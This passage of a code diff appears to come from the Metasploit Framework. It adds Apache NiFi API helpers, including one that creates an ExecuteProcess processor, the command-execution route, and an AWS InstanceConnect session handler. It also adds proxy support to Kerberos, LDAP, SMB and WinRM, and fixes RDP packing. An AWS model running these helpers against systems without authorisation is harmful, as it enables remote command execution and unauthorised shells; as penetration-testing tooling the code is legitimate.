+              'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', 'root')
+            }
+            opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+            res = send_request_cgi(opts)
+            
+            if res.nil?
+              print_bad("#{peer} - Could not connect to web service - no response")
+              return nil
+            end
+
+            unless res.code == 200
+              print_bad("Unexpected response code: #{res.code}")
+              return nil
+            end
+            res.get_json_document['id']
+          end
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,57 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Nifi::Auth
+  include Msf::Exploit::Remote::HttpClient
+
+  # Determines if the Apache Nifi instance supports login.
+  #
+  # @return the value of supportsLogin from the server, nil on error
+  def supports_login?
+    vprint_status('Attempting to retrieve access configuration')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'config')
+    })
+
+    if res.nil?
+      print_bad("#{peer} - Could not connect to web service - no response")
+      return nil
+    end
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      return nil
+    end
+    res.get_json_document.dig('config', 'supportsLogin')
+  end
+
+  # Attempts a login with username and password to retrieve a bearer token for APIs
+  #
+  # @return [String] The bearer token on successful login, nil on errors
+  def retrieve_login_token
+    vprint_status('Attempting to login')
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'nifi-api', 'access', 'token'),
+        'vars_post' => {
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD']
+        }
+      }
+    )
+    if res.nil?
+      print_bad("#{peer} - Could not connect to web service - no response")
+      return nil
+    end
+
+    if res.code == 400
+      print_bad('Invalid Credentials')
+      return nil
+    elsif res.code != 201
+      print_bad("Unexpected response code: #{res.code}")
+      return nil
+    end
+    res.body
+  end
+end
@@ -0,0 +1,155 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Nifi::Dbconnectionpool
+  include Msf::Exploit::Remote::HttpClient
+
+  class DBConnectionPoolError < StandardError
+  end
+
+  # Stop DB Connection Pool
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param db_con_pool [String] UUID of the DBConnectionPool
+  def stop_dbconnectionpool(token, db_con_pool)
+    vprint_status("Attempting to stop DB Connection Pool: #{db_con_pool}")
+    body = {
+      'disconnectedNodeAcknowledged' => false,
+      'state' => 'DISABLED',
+      'uiOnly' => true,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', db_con_pool, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise DBConnectionPoolError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise DBConnectionPoolError
+    end
+    print_good('DB Connection Pool Stop sent successfully')
+  end
+
+  # Delete DB Connection Pool
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param db_con_pool [String] UUID of the DBConnectionPool
+  # @param version [Integer] version of the DBConnectionPool to delete
+  def delete_dbconnectionpool(token, db_con_pool, version = 0)
+    vprint_status("Attempting to delete version #{version} of DB Connection Pool: #{db_con_pool}")
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', db_con_pool),
+      'vars_get' => { 'version' => version }
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+
+    raise DBConnectionPoolError if res.nil?
+
+    while res.code == 400 && res.body.include?('is not the most up-to-date revision') && version <= 20
+      version += 1
+      opts['vars_get'] = { 'version' => version }
+
+      res = send_request_cgi(opts)
+      raise DBConnectionPoolError if res.nil?
+
+      vprint_status("Found newer revision of #{db_con_pool}, attempting to delete version #{version}") if res.code == 400 && res.body.include?('is not the most up-to-date revision')
+    end
+
+    if version == 20
+      print_bad("Aborting after attempting to delete #{version} version of DB Connection Pool: #{db_con_pool}")
+      raise DBConnectionPoolError
+    end
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise DBConnectionPoolError
+    end
+    print_good('DB Connection Pool Delete sent successfully')
+  end
+
+  # Start DB Connection Pool
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param db_con_pool [String] UUID of the DBConnectionPool
+  def start_dbconnectionpool(token, db_con_pool)
+    vprint_status("Attempting to start DB Connection Pool: #{db_con_pool}")
+    body = {
+      'disconnectedNodeAcknowledged' => false,
+      'state' => 'ENABLED',
+      'uiOnly' => true,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'controller-services', db_con_pool, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise DBConnectionPoolError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise DBConnectionPoolError
+    end
+    print_good('DB Connection Pool Start sent successfully')
+  end
+
+  # Create DB Connection Pool
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param name [String] Name to give to the db connection pool
+  # @param process_group [String] UUID of the process_group
+  # @param nifi_version [String] version number of the nifi instance
+
+  def create_dbconnectionpool(token, name, process_group, nifi_version)
+    vprint_status("Attempting to create DB Connection Pool in Process Group: #{process_group}")
+    body = {
+      'revision' =>
+          {
+            'clientId' => 'x',
+            'version' => 0
+          },
+      'disconnectedNodeAcknowledged' => false,
+      'component' => {
+        'type' => 'org.apache.nifi.dbcp.DBCPConnectionPool',
+        'bundle' => {
+          'group' => 'org.apache.nifi',
+          'artifact' => 'nifi-dbcp-service-nar',
+          'version' => nifi_version.to_s
+        },
+        'name' => name
+      }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', process_group, 'controller-services'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise DBConnectionPoolError if res.nil?
+
+    unless res.code == 201
+      print_bad("Unexpected response code: #{res.code}")
+      raise DBConnectionPoolError
+    end
+    print_good('DB Connection Pool Created successfully')
+    res.get_json_document['id']
+  end
+end
@@ -0,0 +1,176 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Nifi::Processor
+  include Msf::Exploit::Remote::HttpClient
+
+  class ProcessorError < StandardError
+  end
+
+  # Start processor
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param processor [String] UUID of the processes
+  def start_processor(token, processor)
+    vprint_status("Attempting to start Processor: #{processor}")
+    body = {
+      'state' => 'RUNNING',
+      'disconnectedNodeAcknowledged' => false,
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 0
+      }
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    print_good('Processor Start sent successfully')
+  end
+
+  # Stop processor
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param processor [String] UUID of the processes
+  def stop_processor(token, processor)
+    vprint_status("Attempting to stop Processor: #{processor}")
+    body = {
+      'revision' => {
+        'clientId' => 'x',
+        'version' => 1
+      },
+      'state' => 'STOPPED'
+    }
+    opts = {
+      'method' => 'PUT',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'run-status'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+
+    # Stop may not have worked (but must be done first). Terminate threads now
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor, 'threads')
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    raise ProcessorError if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    print_good('Processor Stop sent successfully')
+  end
+
+  # Delete a processor
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param processor [String] UUID of the processes
+  # @param version [Int] The version number to delete
+  def delete_processor(token, processor, version = 0)
+    vprint_status("Attempting to delete version #{version} of Processor: #{processor}")
+    opts = {
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor),
+      'vars_get' => { 'version' => version }
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    
+    raise ProcessorError if res.nil?
+
+    while res.code == 400 && res.body.include?('is not the most up-to-date revision') && version <= 20
+      version += 1
+      opts['vars_get'] = { 'version' => version }
+
+      res = send_request_cgi(opts)
+      raise ProcessorError if res.nil?
+
+      vprint_status("Found newer revision of #{processor}, attempting to delete version #{version}") if res.code == 400 && res.body.include?('is not the most up-to-date revision')
+    end
+
+    if version == 20
+      print_bad("Aborting after attempting to delete 20 version of Processor: #{processor}")
+      raise ProcessorError
+    end
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    print_good('Processor Delete sent successfully')
+  end
+
+  # Creates a processor in a process group
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param process_group [String] UUID of a processor group
+  # @param type [String] What type of processor to create
+  # @return [String] The UUID of the root process group
+  def create_processor(token, process_group, type = 'org.apache.nifi.processors.standard.ExecuteProcess')
+    vprint_status("Attempting to create of processor in group: #{process_group} of type #{type}")
+    body = {
+      'component' => { 'type' => type },
+      'revision' => { 'version' => 0 }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', process_group, 'processors'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+    return nil if res.nil?
+
+    unless res.code == 201
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+    res.get_json_document['id']
+  end
+
+  # Get a processor in a process group
+  #
+  # @param token [String] The bearer token from a valid login, or nil for no Authorization headers
+  # @param processor [String] UUID of a processoror
+  # @param field [String] the key from the JSON blob to return
+  # @return [String] THe value from the specified field
+  def get_processor_field(token, processor, field = 'id')
+    vprint_status("Attempting to get field #{field} of processor: #{processor}")
+    opts = {
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'processors', processor)
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{token}" } if token
+    res = send_request_cgi(opts)
+
+    return nil if res.nil?
+
+    unless res.code == 200
+      print_bad("Unexpected response code: #{res.code}")
+      raise ProcessorError
+    end
+
+    res.get_json_document[field]
+  end
+end
@@ -45,6 +45,7 @@ module Msf::Exploit::Remote::Kerberos::AuthBrute
    scanner = ::Metasploit::Framework::LoginScanner::Kerberos.new(
      host: self.rhost,
      port: self.rport,
+      proxies: datastore['Proxies'],
      server_name: "krbtgt/#{domain}",
      cred_details: cred_collection,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
@@ -69,6 +69,13 @@ module Msf
            "#{rhost}:#{rport}"
          end

+          # Returns the configured proxy list
+          #
+          # @return [String,nil]
+          def proxies
+            datastore['Proxies']
+          end
+
          # Creates a kerberos connection
          #
          # @param opts [Hash{Symbol => <String, Integer>}]
@@ -79,6 +86,7 @@ module Msf
            kerb_client = Rex::Proto::Kerberos::Client.new(
              host: opts[:rhost] || rhost,
              port: (opts[:rport] || rport).to_i,
+              proxies: opts[:proxies] || proxies,
              timeout: (opts[:timeout] || timeout).to_i,
              context:
                {
@@ -300,7 +300,7 @@ module Msf
            def build_pa_for_user(opts = {})
              auth_package = 'Kerberos'.b

-              checksum_data = [Rex::Proto::Kerberos::Model::NameType::NT_PRINCIPAL].pack('<I')
+              checksum_data = [Rex::Proto::Kerberos::Model::NameType::NT_PRINCIPAL].pack('I<')
              checksum_data << opts[:username].b
              checksum_data << opts[:realm].b
              checksum_data << auth_package
@@ -37,6 +37,10 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
  #   @return [Integer] the kerberos port to request a ticket from
  attr_reader :port

+  # @!attribute [r] host
+  #   @return [String,nil] The proxy directive to use for the socket
+  attr_reader :proxies
+
  # @!attribute [r] timeout
  #   @return [Integer] the kerberos timeout
  attr_reader :timeout
@@ -104,6 +108,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
      username: nil,
      password: nil,
      host: nil,
+      proxies: nil,
      port: 88,
      timeout: 25,
      framework: nil,
@@ -121,6 +126,7 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
    @realm = realm
    @hostname = hostname
    @host = host
+    @proxies = proxies
    @port = port
    @timeout = timeout
    @username = username
@@ -35,6 +35,7 @@ module Msf

      register_advanced_options(
        [
+          Opt::Proxies,
          *kerberos_storage_options(protocol: 'LDAP'),
          *kerberos_auth_options(protocol: 'LDAP', auth_methods: Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS),
          Msf::OptPath.new('LDAP::CertFile', [false, 'The path to the PKCS12 (.pfx) certificate file to authenticate with'], conditions: ['LDAP::Auth', '==', Msf::Exploit::Remote::AuthOption::SCHANNEL]),
@@ -74,6 +75,7 @@ module Msf
      connect_opts = {
        host: rhost,
        port: rport,
+        proxies: datastore['Proxies'],
        connect_timeout: datastore['LDAP::ConnectTimeout']
      }

@@ -126,6 +128,7 @@ module Msf
        kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
          host: datastore['DomainControllerRhost'],
          hostname: datastore['Ldap::Rhostname'],
+          proxies: datastore['Proxies'],
          realm: datastore['DOMAIN'],
          username: datastore['USERNAME'],
          password: datastore['PASSWORD'],
@@ -354,6 +354,7 @@ module Exploit::Remote::MSSQL
      kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
        host: datastore['DomainControllerRhost'],
        hostname: datastore['Mssql::Rhostname'],
+        proxies: datastore['Proxies'],
        mssql_port: rport,
        realm: datastore['MssqlDomain'],
        username: datastore['username'],
@@ -230,8 +230,8 @@ module Exploit::Remote::RDP
      [self.rdp_user_id, chan_id].pack('S>S>'), # MCS send data request structure, choice 25
      "\x70", # Wut (security header)
      per_data(
-        [data_length].pack('<L'),
-        [flags].pack('<L'),
+        [data_length].pack('L<'),
+        [flags].pack('L<'),
        data
      )
    ].join('')
@@ -584,7 +584,7 @@ module Exploit::Remote::RDP

    sha1 << mac_salt_key
    sha1 << pad1
-    sha1 << [data_content.length].pack('<L')
+    sha1 << [data_content.length].pack('L<')
    sha1 << data_content

    md5 << mac_salt_key
@@ -1247,10 +1247,10 @@ protected
    flags: RDPConstants::REDIRECTION_SUPPORTED | RDPConstants::REDIRECTION_VERSION3,
    session_id: 0
  )
-    body = [flags, session_id].pack('<L<L')
+    body = [flags, session_id].pack('L<L<')

    result = [
-      [0xc004, body.length + 4].pack('<S<S'),
+      [0xc004, body.length + 4].pack('S<S<'),
      body
    ].join('')

@@ -1261,10 +1261,10 @@ protected
    encryption_methods: RDPConstants::ENCRYPTION_40BIT | RDPConstants::ENCRYPTION_128BIT,
    ext_encryption_methods: 0
  )
-    body = [encryption_methods, ext_encryption_methods].pack('<L<L')
+    body = [encryption_methods, ext_encryption_methods].pack('L<L<')

    result = [
-      [0xc002, body.length + 4].pack('<S<S'),
+      [0xc002, body.length + 4].pack('S<S<'),
      body
    ].join('')

@@ -1273,7 +1273,7 @@ protected

  def cs_network_data(channels)
    chan_data = channels.map{ |c|
-      [c[0].encode('ASCII')].pack('a8*') + [c[1]].pack('L')
+      [c[0].encode('ASCII')].pack('a8') + [c[1]].pack('L')
    }.join('')

    body = [
@@ -1282,13 +1282,14 @@ protected
    ].join('')

    result = [
-      [0xc003, body.length + 4].pack('<S<S'),
+      [0xc003, body.length + 4].pack('S<S<'),
      body
    ].join('')

    result
  end

+  # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/00f1da4a-ee9c-421a-852f-c19f92343d73
  def cs_core_data(
    version: 0x80004,
    width: 800,
@@ -1309,18 +1310,18 @@ protected
    client_dig_product_id = Rex::Text.to_unicode(client_dig_product_id[0..32], 'utf-16le')

    body = [
-      [version, width, height].pack('<L<S<S'),
+      [version, width, height].pack('L<S<S<'),
      "\x01\xca", # colour depth (8BPP)
      "\x03\xaa", # SASSequence
-      [keyboard, client_build, client_name, keyboard_type].pack('<L<La32*'),
-      [keyboard_type, keyboard_subtype, keyboard_func_key].pack('<L<L<L'),
+      [keyboard, client_build, client_name].pack('L<L<a32'),
+      [keyboard_type, keyboard_subtype, keyboard_func_key].pack('L<L<L<'),
      "\x00" * 64, # imeFileName
      "\x01\xca", # postBeta2ColorDepth (8BPP)
-      [client_product_id, serial_num].pack('<S<L'),
+      [client_product_id, serial_num].pack('S<L<'),
      "\x18\x00", # highColorDepth: 24 bpp
      "\x07\x00", # supportedColorDepths: flag (24 bpp | 16 bpp | 15 bpp )
      "\x01\x00", # earlyCapabilityFlags: 1 (RNS_UD_CS_SUPPORT_ERRINFO_PDU)
-      [client_dig_product_id].pack('a64*'),
+      [client_dig_product_id].pack('a64'),
      "\x00", # connectionType: 0
      "\x00", # pad1octet
      # serverSelectedProtocol - After negotiating TLS or CredSSP this value must
@@ -1330,7 +1331,7 @@ protected
    ].join('')

    result = [
-      [0xc001, body.length + 4].pack('<S<S'),
+      [0xc001, body.length + 4].pack('S<S<'),
      body
    ].join('')

@@ -1400,7 +1401,7 @@ protected
        if pkt[7] == "\x68"
          chan_user_id = pkt[8..9].unpack('S>')[0]
          chan_id = pkt[10..11].unpack('S>')[0]
-          flags = pkt[18..21].unpack('<L')[0]
+          flags = pkt[18..21].unpack('L<')[0]
          data = pkt[22..pkt.length]
          rdp_on_channel_receive(pkt, chan_user_id, chan_id, flags, data)
        end
@@ -160,6 +160,7 @@ module Msf
          kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::SMB.new(
            host: datastore['DomainControllerRhost'],
            hostname: datastore['Smb::Rhostname'],
+            proxies: datastore['Proxies'],
            realm: datastore['SMBDomain'],
            username: datastore['SMBUser'],
            password: datastore['SMBPass'],
@@ -67,6 +67,7 @@ module Exploit::Remote::WinRM
      endpoint: endpoint,
      host: rhost,
      port: rport,
+      proxies: datastore['Proxies'],
      uri: uri,
      ssl: ssl,
      transport: :rexhttp,
@@ -81,6 +82,7 @@ module Exploit::Remote::WinRM
      kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
        host: datastore['DomainControllerRhost'],
        hostname: datastore['Winrm::Rhostname'],
+        proxies: datastore['Proxies'],
        realm: datastore['DOMAIN'],
        username: datastore['USERNAME'],
        password: datastore['PASSWORD'],
@@ -17,7 +17,7 @@ module Msf
    WRAPPED_TABLES = 'wrapped_tables'
    DATASTORE_FALLBACKS = 'datastore_fallbacks'
    FULLY_INTERACTIVE_SHELLS = 'fully_interactive_shells'
-    SERVICEMANAGER_COMMAND = 'servicemanager_command'
+    MANAGER_COMMANDS = 'manager_commands'
    DEFAULTS = [
      {
        name: WRAPPED_TABLES,
@@ -30,8 +30,8 @@ module Msf
        default_value: false
      }.freeze,
      {
-        name: SERVICEMANAGER_COMMAND,
-        description: 'When enabled you will have access to the _servicemanager command',
+        name: MANAGER_COMMANDS,
+        description: 'When enabled you will have access to manager commands such as _servicemanager and _historymanager',
        default_value: false
      }.freeze,
      {
@@ -0,0 +1,362 @@
+# -*- coding: binary -*-
+module Msf
+module Handler
+
+require 'aws-sdk-ec2instanceconnect'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+require 'rex/socket/ssh_factory'
+
+###
+#
+# This module implements the AWS InstanceConnect handler.  This means that
+# it will attempt to connect to a remote host through the AWS InstanceConnect pipe for
+# a period of time (typically the duration of an exploit) to see if the  agent has
+# started listening.
+#
+###
+module BindAwsInstanceConnect
+  include Msf::Handler
+  #
+  # Returns the handler specific string representation, in this case
+  # 'bind_aws_instance_connect'.
+  #
+  def self.handler_type
+    'bind_aws_instance_connect'
+  end
+
+  #
+  # Returns the connection oriented general handler type, in this case bind.
+  #
+  def self.general_handler_type
+    'bind'
+  end
+
+  # A string suitable for displaying to the user
+  #
+  # @return [String]
+  def human_name
+    'bind AWS InstanceConnect'
+  end
+
+  #
+  # Initializes a bind handler and adds the options common to all bind
+  # payloads, such as local port.
+  #
+  def initialize(info = {})
+    super
+
+    register_options(
+      [
+        OptString.new('EC2_ID', [true, 'The EC2 ID of the instance ', '']),
+        OptString.new('REGION', [true, 'AWS region containing the instance', 'us-east-1']),
+        OptString.new('ACCESS_KEY_ID', [false, 'AWS access key', nil]),
+        OptString.new('SECRET_ACCESS_KEY', [false, 'AWS secret key', nil]),
+        OptString.new('INSTANCE_USER', [false, 'Username on the EC2 instance with which to log-in']),
+        OptString.new('ROLE_ARN', [false, 'AWS assumed role ARN', nil]),
+        OptString.new('ROLE_SID', [false, 'AWS assumed role session ID', nil]),
+        OptString.new('USERNAME', [false, 'EC2 instance local username to authenticate with']),
+        OptString.new('PASSWORD', [false, 'EC2 instance local password to authenticate with'])
+      ], Msf::Handler::BindAwsInstanceConnect)
+
+    register_advanced_options(
+      [
+        OptString.new('PRIVATE_KEY', [
+          false,
+          'The string value of the private key that will be used. If you are using MSFConsole,
+          this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.'
+        ]),
+        OptString.new('KEY_PASS', [false, 'Passphrase for SSH private key(s)']),
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false])
+      ], Msf::Handler::BindAwsInstanceConnect)
+
+    self.listener_threads = []
+    self.conn_threads = []
+    self.listener_pairs   = {}
+  end
+
+  #
+  # Kills off the connection threads if there are any hanging around.
+  #
+  def cleanup_handler
+    # Kill any remaining handle_connection threads that might
+    # be hanging around
+    stop_handler
+    conn_threads.each { |thr|
+      begin
+        thr.kill
+      rescue => e
+        elog(e)
+      end
+    }
+  end
+
+  #
+  # Starts a new connecting thread
+  #
+  def add_handler(opts={})
+
+    # Merge the updated datastore values
+    opts.each_pair do |k,v|
+      datastore[k] = v
+    end
+
+    # Start a new handler
+    start_handler
+  end
+
+  #
+  # Starts monitoring for an outbound connection to become established.
+  #
+  def start_handler
+    if datastore['EC2_ID'].blank?
+      raise Msf::OptionValidateError.new({ 'EC2_ID' => "EC2_ID cannot be blank" })
+    end
+
+    # Maximum number of seconds to run the handler
+    ctimeout = 150
+
+    # Maximum number of seconds to await initial API response
+    rtimeout = 5
+
+    if (exploit_config and exploit_config['active_timeout'])
+      ctimeout = exploit_config['active_timeout'].to_i
+    end
+    return if self.listener_pairs[datastore['EC2_ID']]
+    self.listener_pairs[datastore['EC2_ID']] = true
+
+    # Start a new handling thread
+    self.listener_threads << framework.threads.spawn("BindAwsInstanceConnectHandler-#{datastore['EC2_ID']}", false) {
+      instance_connect_client = nil
+
+      print_status("Started #{human_name} handler against #{datastore['EC2_ID']}:#{datastore['REGION']}")
+
+      stime = Time.now.to_i
+
+      while (stime + ctimeout > Time.now.to_i)
+        begin
+          # Call API to start InstanceConnect session
+          if start_instance_connect_session
+            instance_connect_client = connect_ssh
+          else
+            raise Rex::ConnectionError.new('Cannot establish serial connection to ' + datastore['EC2_ID'])
+          end
+        rescue Aws::EC2InstanceConnect::Errors::SerialConsoleSessionLimitExceededException => e
+          vprint_error("Too many active serial console sessions. It takes 30 seconds to tear down a session after you've disconnected from the serial console in order to allow a new session.")
+        rescue Aws::Errors::ServiceError => e
+          vprint_error(e.message)
+        rescue Rex::ConnectionError => e
+          vprint_error(e.message)
+        rescue StandardError => e
+          vprint_error(e.message)
+          elog("Exception caught in InstanceConnect handler: #{$!.class} #{$!}", error: e)
+          break
+        end
+        break if instance_connect_client
+
+        # Wait a second before trying again
+        Rex::ThreadSafe.sleep(0.5)
+      end
+
+      # Valid client connection?
+      if (instance_connect_client)
+        # Increment the has connection counter
+        self.pending_connections += 1
+
+        # Timeout and datastore options need to be passed through to the client
+        opts = {
+          :datastore       => datastore,
+          :expiration      => datastore['SessionExpirationTimeout'].to_i,
+          :comm_timeout    => datastore['SessionCommunicationTimeout'].to_i,
+          :retry_total     => datastore['SessionRetryTotal'].to_i,
+          :retry_wait      => datastore['SessionRetryWait'].to_i,
+          :serial_username => datastore['USERNAME'],
+          :serial_password => datastore['PASSWORD']
+        }
+
+        self.conn_threads << framework.threads.spawn("BindAwsInstanceConnectHandlerSession", false, instance_connect_client, opts) { |ssh, opts_copy|
+          begin
+            self.listener_pairs[datastore['EC2_ID']] = ssh
+            handle_connection(ssh, opts_copy)
+          rescue => e
+            elog('Exception raised from BindAwsInstanceConnect.handle_connection', error: e)
+          end
+        }
+      else
+        wlog("No connection received before the handler completed")
+      end
+    }
+  end
+
+  # A URI describing what the payload is configured to use for transport
+  def payload_uri
+    "serial+ssh://#{datastore['EC2_ID']}:#{INSTANCE_PORT}"
+  end
+
+  def comm_string
+    if self.listener_pairs[datastore['EC2_ID']].nil?
+      "(setting up)"
+    else
+      "(via #{ssh_url})"
+    end
+  end
+
+  def stop_handler
+    # Stop the listener threads
+    self.listener_threads.each do |t|
+      t.kill
+    end
+    self.listener_threads = []
+    self.listener_pairs = {}
+  end
+
+private
+
+  # Any non-zero value currently triggers an exception but it looks like it may be configurable in the future.
+  INSTANCE_PORT = 0
+
+  #
+  # Handles key consumption or generation as appropriate for the session
+  #
+  def ssh_key
+    @ssh_key ||= if datastore['PRIVATE_KEY']
+      Net::SSH::KeyFactory.load_data_private_key(
+        File.read(datastore['PRIVATE_KEY']), datastore['KEY_PASS'], false
+      )
+    else
+      Net::SSH::KeyFactory.load_data_private_key(
+        OpenSSL::PKey::RSA.generate(2048).to_pem, nil, false
+      )
+    end
+  end
+
+  #
+  # Produces appropriate SSH public key string from key materiel
+  #
+  def pub_key
+    key_str = ssh_key.public_key.ssh_type
+    key_str << ' '
+    key_str << Rex::Text.encode_base64(ssh_key.public_key.to_blob)
+    return key_str
+  end
+
+  #
+  # Generates the SSH connection host for the SSH socket
+  #
+  def ssh_hostname(tld = '.aws')
+    'serial-console.ec2-instance-connect.'+ datastore['REGION'] + tld
+  end
+
+  #
+  # Generates the SSH username for the SSH socket
+  #
+  def ssh_user
+    datastore['INSTANCE_USER'] || "#{datastore['EC2_ID']}.port#{INSTANCE_PORT}"
+  end
+
+  #
+  # Convenience method for testing
+  #
+  def ssh_url
+    ssh_user + '@' + ssh_hostname
+  end
+
+  #
+  # Initiates SSH connection to AWS proxy - override this in modules
+  #
+  def connect_ssh
+    ssh_options = {
+      non_interactive: true,
+      config: false,
+      use_agent: false,
+      verify_host_key: :never,
+      append_all_supported_algorithms: true,
+      check_host_ip: false,
+      proxy: Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies']),
+      auth_methods: ['publickey'],
+      key_data: [ssh_key.to_s],
+      port: datastore['RPORT'] || 22
+    }
+    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+    ::Timeout.timeout(datastore['WfsTimeout']) do
+      return Net::SSH.start(Rex::Socket.resolv_to_dotted(ssh_hostname), ssh_user, ssh_options)
+    end
+  end
+
+  #
+  # Starts an InstanceConnect session
+  #
+  def start_instance_connect_session
+    # Configure AWS credentials
+    credentials = if datastore['ACCESS_KEY_ID'] and datastore['SECRET_ACCESS_KEY']
+      ::Aws::Credentials.new(datastore['ACCESS_KEY_ID'], datastore['SECRET_ACCESS_KEY'])
+    else
+      nil
+    end
+    # Attempt to assume role from current context
+    credentials = if datastore['ROLE_ARN'] and datastore['ROLE_SID']
+      ::Aws::AssumeRoleCredentials.new(
+        client: ::Aws::STS::Client.new(
+          region: datastore['REGION'],
+          credentials: credentials
+        ),
+        role_arn: datastore['ROLE_ARN'],
+        role_session_name: datastore['ROLE_SID']
+      )
+    else
+      credentials
+    end
+
+    client = ::Aws::EC2InstanceConnect::Client.new(
+      region: datastore['REGION'],
+      credentials: credentials
+    )
+    session_params = {
+      instance_id: datastore['EC2_ID'],
+      serial_port: INSTANCE_PORT,
+      ssh_public_key: pub_key
+    }
+    session_params[:instance_os_user] = datastore['INSTANCE_USER'] if datastore['INSTANCE_USER']
+
+    # There are two methods for initiating a session, one with user-name, one without
+    resp = if datastore['INSTANCE_USER']
+      client.send_ssh_public_key(session_params)
+    else
+      client.send_serial_console_ssh_public_key(session_params)
+    end
+    return resp.success
+  end
+
+  def create_session(ssh, opts = {})
+    s = Msf::Sessions::AwsInstanceConnectCommandShellBind.new(ssh, opts)
+    # Pass along the framework context
+    s.framework = framework
+
+    # Associate this system with the original exploit
+    # and any relevant information
+    s.set_from_exploit(assoc_exploit) if assoc_exploit
+
